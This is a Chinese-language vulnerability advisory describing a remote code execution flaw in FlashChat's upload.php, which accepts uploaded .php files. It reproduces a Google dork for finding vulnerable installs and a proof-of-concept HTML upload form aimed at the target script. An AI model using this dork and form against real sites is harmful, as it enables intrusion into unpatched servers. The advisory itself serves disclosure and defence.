当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

FlashChat upload.php 文件上传远程代码执行漏洞

信息来源:x-hayben21      发表日期:2013-09-18 17:27:00

FlashChat是一款个性化聊天室,支持大部分的PHP格式的CMS系统,也可以作为独立的聊天室。

 

FlashChat的upload.php脚本没有正确验证或过滤用户上传的文件,通过上传.php文件,远程系统会替换用户可访问路径内的文件,通过直接访问已经上传的文件,可使远程用户执行任意代码。

 

BUGTRAQ-ID:62852

受影响系统:

TUFaT Flashchat v6.0.8

TUFaT Flashchat v6.0.7

TUFaT Flashchat v6.0.6

TUFaT Flashchat v6.0.5

TUFaT Flashchat v6.0.4

TUFaT Flashchat v6.0.2

 

测试方法:

警  告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#######################################################

# Exploit Title: FlashChat File Upload Vulnerability

# Google Dork: intitle:FlashChat v6.0.8

# Date: 02.10.2013

# Exploit Author: x-hayben21

# Vendor Homepage: www.punish3r.com

# Software Link: http://www.tufat.com/script2.htm

# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,

# Tested on: Windows, PHP 5.2

#

# Special Thanks : MaXtoR - PoLoNia

#######################################################

 

#Vulnerable File : upload.php

 

#Exploit

<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">

<label for="file">Filename:</label>

<input type="file" name="file" id="file"><br>

<input type="submit" name="submit" value="Submit">

</form>

解决办法:

厂商补丁:

 

TUFaT

-----

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.tufat.com/index.php

 

参考信息:

http://www.osvdb.org/98233